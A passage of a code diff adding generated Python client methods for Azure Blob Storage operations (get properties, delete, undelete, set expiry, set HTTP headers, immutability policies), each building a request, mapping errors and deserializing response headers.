+            response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed'))
+            response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time'))
+            response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date'))
+            response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode'))
+            response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold'))
+
+            deserialized = response.stream_download(self._client._pipeline)
+
+        if cls:
+            return cls(pipeline_response, deserialized, response_headers)
+
+        return deserialized
+
+    download.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
+
+
+    @distributed_trace
+    def get_properties(  # pylint: disable=inconsistent-return-statements
+        self,
+        snapshot=None,  # type: Optional[str]
+        version_id=None,  # type: Optional[str]
+        timeout=None,  # type: Optional[int]
+        request_id_parameter=None,  # type: Optional[str]
+        lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
+        cpk_info=None,  # type: Optional["_models.CpkInfo"]
+        modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> None
+        """The Get Properties operation returns all user-defined metadata, standard HTTP properties,
+        and system properties for the blob. It does not return the content of the blob.
+
+        :param snapshot: The snapshot parameter is an opaque DateTime value that, when present,
+         specifies the blob snapshot to retrieve. For more information on working with blob
+         snapshots, see :code:`Creating a Snapshot of a Blob.`. Default value is None.
+        :type snapshot: str
+        :param version_id: The version id parameter is an opaque DateTime value that, when present,
+         specifies the version of the blob to operate on. It's for service version 2019-10-10 and
+         newer. Default value is None.
+        :type version_id: str
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+         :code:`Setting Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB
+         character limit that is recorded in the analytics logs when storage analytics logging is
+         enabled. Default value is None.
+        :type request_id_parameter: str
+        :param lease_access_conditions: Parameter group. Default value is None.
+        :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
+        :param cpk_info: Parameter group. Default value is None.
+        :type cpk_info: ~azure.storage.blob.models.CpkInfo
+        :param modified_access_conditions: Parameter group. Default value is None.
+        :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: None, or the result of cls(response)
+        :rtype: None
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType[None]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        _lease_id = None
+        _encryption_key = None
+        _encryption_key_sha256 = None
+        _encryption_algorithm = None
+        _if_modified_since = None
+        _if_unmodified_since = None
+        _if_match = None
+        _if_none_match = None
+        _if_tags = None
+        if lease_access_conditions is not None:
+            _lease_id = lease_access_conditions.lease_id
+        if cpk_info is not None:
+            _encryption_key = cpk_info.encryption_key
+            _encryption_key_sha256 = cpk_info.encryption_key_sha256
+            _encryption_algorithm = cpk_info.encryption_algorithm
+        if modified_access_conditions is not None:
+            _if_modified_since = modified_access_conditions.if_modified_since
+            _if_unmodified_since = modified_access_conditions.if_unmodified_since
+            _if_match = modified_access_conditions.if_match
+            _if_none_match = modified_access_conditions.if_none_match
+            _if_tags = modified_access_conditions.if_tags
+
+        request = build_get_properties_request(
+            url=self._config.url,
+            version=self._config.version,
+            snapshot=snapshot,
+            version_id=version_id,
+            timeout=timeout,
+            lease_id=_lease_id,
+            encryption_key=_encryption_key,
+            encryption_key_sha256=_encryption_key_sha256,
+            encryption_algorithm=_encryption_algorithm,
+            if_modified_since=_if_modified_since,
+            if_unmodified_since=_if_unmodified_since,
+            if_match=_if_match,
+            if_none_match=_if_none_match,
+            if_tags=_if_tags,
+            request_id_parameter=request_id_parameter,
+            template_url=self.get_properties.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=False,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [200]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
+        response_headers['x-ms-creation-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-creation-time'))
+        response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta'))
+        response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id'))
+        response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or'))
+        response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type'))
+        response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time'))
+        response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description'))
+        response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id'))
+        response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress'))
+        response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source'))
+        response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status'))
+        response_headers['x-ms-incremental-copy']=self._deserialize('bool', response.headers.get('x-ms-incremental-copy'))
+        response_headers['x-ms-copy-destination-snapshot']=self._deserialize('str', response.headers.get('x-ms-copy-destination-snapshot'))
+        response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
+        response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
+        response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))
+        response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
+        response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
+        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
+        response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5'))
+        response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
+        response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
+        response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
+        response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
+        response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number'))
+        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+        response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
+        response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count'))
+        response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted'))
+        response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256'))
+        response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope'))
+        response_headers['x-ms-access-tier']=self._deserialize('str', response.headers.get('x-ms-access-tier'))
+        response_headers['x-ms-access-tier-inferred']=self._deserialize('bool', response.headers.get('x-ms-access-tier-inferred'))
+        response_headers['x-ms-archive-status']=self._deserialize('str', response.headers.get('x-ms-archive-status'))
+        response_headers['x-ms-access-tier-change-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-access-tier-change-time'))
+        response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id'))
+        response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version'))
+        response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count'))
+        response_headers['x-ms-expiry-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-expiry-time'))
+        response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed'))
+        response_headers['x-ms-rehydrate-priority']=self._deserialize('str', response.headers.get('x-ms-rehydrate-priority'))
+        response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time'))
+        response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date'))
+        response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode'))
+        response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold'))
+
+
+        if cls:
+            return cls(pipeline_response, None, response_headers)
+
+    get_properties.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
+
+
+    @distributed_trace
+    def delete(  # pylint: disable=inconsistent-return-statements
+        self,
+        snapshot=None,  # type: Optional[str]
+        version_id=None,  # type: Optional[str]
+        timeout=None,  # type: Optional[int]
+        delete_snapshots=None,  # type: Optional[Union[str, "_models.DeleteSnapshotsOptionType"]]
+        request_id_parameter=None,  # type: Optional[str]
+        blob_delete_type="Permanent",  # type: Optional[str]
+        lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
+        modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> None
+        """If the storage account's soft delete feature is disabled then, when a blob is deleted, it
+        is permanently removed from the storage account. If the storage account's soft delete
+        feature is enabled, then, when a blob is deleted, it is marked for deletion and becomes
+        inaccessible immediately. However, the blob service retains the blob or snapshot for the
+        number of days specified by the DeleteRetentionPolicy section of [Storage service
+        properties] (Set-Blob-Service-Properties.md). After the specified number of days has
+        passed, the blob's data is permanently removed from the storage account. Note that you
+        continue to be charged for the soft-deleted blob's storage until it is permanently removed.
+        Use the List Blobs API and specify the "include=deleted" query parameter to discover which
+        blobs and snapshots have been soft deleted. You can then use the Undelete Blob API to
+        restore a soft-deleted blob. All other operations on a soft-deleted blob or snapshot cause
+        the service to return an HTTP status code of 404 (ResourceNotFound).
+
+        :param snapshot: The snapshot parameter is an opaque DateTime value that, when present,
+         specifies the blob snapshot to retrieve. For more information on working with blob
+         snapshots, see :code:`Creating a Snapshot of a Blob.`. Default value is None.
+        :type snapshot: str
+        :param version_id: The version id parameter is an opaque DateTime value that, when present,
+         specifies the version of the blob to operate on. It's for service version 2019-10-10 and
+         newer. Default value is None.
+        :type version_id: str
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+         :code:`Setting Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param delete_snapshots: Required if the blob has associated snapshots. Specify one of the
+         following two options: include: Delete the base blob and all of its snapshots. only:
+         Delete only the blob's snapshots and not the blob itself. Default value is None.
+        :type delete_snapshots: str or ~azure.storage.blob.models.DeleteSnapshotsOptionType
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB
+         character limit that is recorded in the analytics logs when storage analytics logging is
+         enabled. Default value is None.
+        :type request_id_parameter: str
+        :param blob_delete_type: Optional. Only possible value is 'permanent', which specifies to
+         permanently delete a blob if blob soft delete is enabled. Possible values are "Permanent"
+         or None. Default value is "Permanent".
+        :type blob_delete_type: str
+        :param lease_access_conditions: Parameter group. Default value is None.
+        :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
+        :param modified_access_conditions: Parameter group. Default value is None.
+        :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: None, or the result of cls(response)
+        :rtype: None
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType[None]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        _lease_id = None
+        _if_modified_since = None
+        _if_unmodified_since = None
+        _if_match = None
+        _if_none_match = None
+        _if_tags = None
+        if lease_access_conditions is not None:
+            _lease_id = lease_access_conditions.lease_id
+        if modified_access_conditions is not None:
+            _if_modified_since = modified_access_conditions.if_modified_since
+            _if_unmodified_since = modified_access_conditions.if_unmodified_since
+            _if_match = modified_access_conditions.if_match
+            _if_none_match = modified_access_conditions.if_none_match
+            _if_tags = modified_access_conditions.if_tags
+
+        request = build_delete_request(
+            url=self._config.url,
+            version=self._config.version,
+            snapshot=snapshot,
+            version_id=version_id,
+            timeout=timeout,
+            lease_id=_lease_id,
+            delete_snapshots=delete_snapshots,
+            if_modified_since=_if_modified_since,
+            if_unmodified_since=_if_unmodified_since,
+            if_match=_if_match,
+            if_none_match=_if_none_match,
+            if_tags=_if_tags,
+            request_id_parameter=request_id_parameter,
+            blob_delete_type=blob_delete_type,
+            template_url=self.delete.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=False,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [202]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+
+
+        if cls:
+            return cls(pipeline_response, None, response_headers)
+
+    delete.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
+
+
+    @distributed_trace
+    def undelete(  # pylint: disable=inconsistent-return-statements
+        self,
+        timeout=None,  # type: Optional[int]
+        request_id_parameter=None,  # type: Optional[str]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> None
+        """Undelete a blob that was previously soft deleted.
+
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+         :code:`Setting Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB
+         character limit that is recorded in the analytics logs when storage analytics logging is
+         enabled. Default value is None.
+        :type request_id_parameter: str
+        :keyword comp: comp. Default value is "undelete". Note that overriding this default value
+         may result in unsupported behavior.
+        :paramtype comp: str
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: None, or the result of cls(response)
+        :rtype: None
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType[None]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        comp = kwargs.pop('comp', "undelete")  # type: str
+
+
+        request = build_undelete_request(
+            url=self._config.url,
+            comp=comp,
+            version=self._config.version,
+            timeout=timeout,
+            request_id_parameter=request_id_parameter,
+            template_url=self.undelete.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=False,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [200]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+
+
+        if cls:
+            return cls(pipeline_response, None, response_headers)
+
+    undelete.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
+
+
+    @distributed_trace
+    def set_expiry(  # pylint: disable=inconsistent-return-statements
+        self,
+        expiry_options,  # type: Union[str, "_models.BlobExpiryOptions"]
+        timeout=None,  # type: Optional[int]
+        request_id_parameter=None,  # type: Optional[str]
+        expires_on=None,  # type: Optional[str]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> None
+        """Sets the time a blob will expire and be deleted.
+
+        :param expiry_options: Required. Indicates mode of the expiry time.
+        :type expiry_options: str or ~azure.storage.blob.models.BlobExpiryOptions
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+         :code:`Setting Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB
+         character limit that is recorded in the analytics logs when storage analytics logging is
+         enabled. Default value is None.
+        :type request_id_parameter: str
+        :param expires_on: The time to set the blob to expiry. Default value is None.
+        :type expires_on: str
+        :keyword comp: comp. Default value is "expiry". Note that overriding this default value may
+         result in unsupported behavior.
+        :paramtype comp: str
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: None, or the result of cls(response)
+        :rtype: None
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType[None]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        comp = kwargs.pop('comp', "expiry")  # type: str
+
+
+        request = build_set_expiry_request(
+            url=self._config.url,
+            comp=comp,
+            version=self._config.version,
+            expiry_options=expiry_options,
+            timeout=timeout,
+            request_id_parameter=request_id_parameter,
+            expires_on=expires_on,
+            template_url=self.set_expiry.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=False,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [200]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
+        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
+        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+
+
+        if cls:
+            return cls(pipeline_response, None, response_headers)
+
+    set_expiry.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
+
+
+    @distributed_trace
+    def set_http_headers(  # pylint: disable=inconsistent-return-statements
+        self,
+        timeout=None,  # type: Optional[int]
+        request_id_parameter=None,  # type: Optional[str]
+        blob_http_headers=None,  # type: Optional["_models.BlobHTTPHeaders"]
+        lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
+        modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> None
+        """The Set HTTP Headers operation sets system properties on the blob.
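+
+        Illustrative sketch only (``client`` is assumed to be a configured
+        :class:`~azure.storage.blob.AzureBlobStorage` pointed at an existing blob); it shows how
+        the ``BlobHTTPHeaders`` parameter group carries the standard HTTP properties::
+
+            from azure.storage.blob.models import BlobHTTPHeaders
+
+            headers = BlobHTTPHeaders(
+                blob_content_type="application/json",
+                blob_cache_control="max-age=3600",
+            )
+            client.blob.set_http_headers(blob_http_headers=headers)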
+
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+         :code:`Setting Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB
+         character limit that is recorded in the analytics logs when storage analytics logging is
+         enabled. Default value is None.
+        :type request_id_parameter: str
+        :param blob_http_headers: Parameter group. Default value is None.
+        :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders
+        :param lease_access_conditions: Parameter group. Default value is None.
+        :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
+        :param modified_access_conditions: Parameter group. Default value is None.
+        :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
+        :keyword comp: comp. Default value is "properties". Note that overriding this default value
+         may result in unsupported behavior.
+        :paramtype comp: str
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: None, or the result of cls(response)
+        :rtype: None
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType[None]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        comp = kwargs.pop('comp', "properties")  # type: str
+
+        _blob_cache_control = None
+        _blob_content_type = None
+        _blob_content_md5 = None
+        _blob_content_encoding = None
+        _blob_content_language = None
+        _lease_id = None
+        _if_modified_since = None
+        _if_unmodified_since = None
+        _if_match = None
+        _if_none_match = None
+        _if_tags = None
+        _blob_content_disposition = None
+        if blob_http_headers is not None:
+            _blob_cache_control = blob_http_headers.blob_cache_control
+            _blob_content_type = blob_http_headers.blob_content_type
+            _blob_content_md5 = blob_http_headers.blob_content_md5
+            _blob_content_encoding = blob_http_headers.blob_content_encoding
+            _blob_content_language = blob_http_headers.blob_content_language
+        if lease_access_conditions is not None:
+            _lease_id = lease_access_conditions.lease_id
+        if modified_access_conditions is not None:
+            _if_modified_since = modified_access_conditions.if_modified_since
+            _if_unmodified_since = modified_access_conditions.if_unmodified_since
+            _if_match = modified_access_conditions.if_match
+            _if_none_match = modified_access_conditions.if_none_match
+            _if_tags = modified_access_conditions.if_tags
+        if blob_http_headers is not None:
+            _blob_content_disposition = blob_http_headers.blob_content_disposition
+
+        request = build_set_http_headers_request(
+            url=self._config.url,
+            comp=comp,
+            version=self._config.version,
+            timeout=timeout,
+            blob_cache_control=_blob_cache_control,
+            blob_content_type=_blob_content_type,
+            blob_content_md5=_blob_content_md5,
+            blob_content_encoding=_blob_content_encoding,
+            blob_content_language=_blob_content_language,
+            lease_id=_lease_id,
+            if_modified_since=_if_modified_since,
+            if_unmodified_since=_if_unmodified_since,
+            if_match=_if_match,
+            if_none_match=_if_none_match,
+            if_tags=_if_tags,
+            blob_content_disposition=_blob_content_disposition,
+            request_id_parameter=request_id_parameter,
+            template_url=self.set_http_headers.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=False,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [200]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
+        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
+        response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number'))
+        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+
+
+        if cls:
+            return cls(pipeline_response, None, response_headers)
+
+    set_http_headers.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
+
+
+    @distributed_trace
+    def set_immutability_policy(  # pylint: disable=inconsistent-return-statements
+        self,
+        timeout=None,  # type: Optional[int]
+        request_id_parameter=None,  # type: Optional[str]
+        immutability_policy_expiry=None,  # type: Optional[datetime.datetime]
+        immutability_policy_mode=None,  # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]]
+        modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> None
+        """The Set Immutability Policy operation sets the immutability policy on the blob.
+
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+         :code:`Setting Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB
+         character limit that is recorded in the analytics logs when storage analytics logging is
+         enabled. Default value is None.
+        :type request_id_parameter: str
+        :param immutability_policy_expiry: Specifies the date time when the blobs immutability
+         policy is set to expire. Default value is None.
+        :type immutability_policy_expiry: ~datetime.datetime
+        :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob.
+         Default value is None.
+        :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode
+        :param modified_access_conditions: Parameter group. Default value is None.
+        :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
+        :keyword comp: comp. Default value is "immutabilityPolicies". Note that overriding this
+         default value may result in unsupported behavior.
+        :paramtype comp: str
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: None, or the result of cls(response)
+        :rtype: None
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType[None]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        comp = kwargs.pop('comp', "immutabilityPolicies")  # type: str
+
+        _if_unmodified_since = None
+        if modified_access_conditions is not None:
+            _if_unmodified_since = modified_access_conditions.if_unmodified_since
+
+        request = build_set_immutability_policy_request(
+            url=self._config.url,
+            comp=comp,
+            version=self._config.version,
+            timeout=timeout,
+            request_id_parameter=request_id_parameter,
+            if_unmodified_since=_if_unmodified_since,
+            immutability_policy_expiry=immutability_policy_expiry,
+            immutability_policy_mode=immutability_policy_mode,
+            template_url=self.set_immutability_policy.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=False,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [200]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+        response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date'))
+        response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode'))
+
+
+        if cls:
+            return cls(pipeline_response, None, response_headers)
+
+    set_immutability_policy.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
+
+
+    @distributed_trace
+    def delete_immutability_policy(  # pylint: disable=inconsistent-return-statements
+        self,
+        timeout=None,  # type: Optional[int]
+        request_id_parameter=None,  # type: Optional[str]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> None
+        """The Delete Immutability Policy operation deletes the immutability policy on the blob.
+
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+         :code:`Setting Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB
+         character limit that is recorded in the analytics logs when storage analytics logging is
+         enabled. Default value is None.
+        :type request_id_parameter: str
+        :keyword comp: comp. Default value is "immutabilityPolicies". Note that overriding this
+         default value may result in unsupported behavior.
+        :paramtype comp: str
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: None, or the result of cls(response)
+        :rtype: None
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType[None]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        comp = kwargs.pop('comp', "immutabilityPolicies")  # type: str
+
+
+        request = build_delete_immutability_policy_request(
+            url=self._config.url,
+            comp=comp,
+            version=self._config.version,
+            timeout=timeout,
+            request_id_parameter=request_id_parameter,
+            template_url=self.delete_immutability_policy.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=False,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [200]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
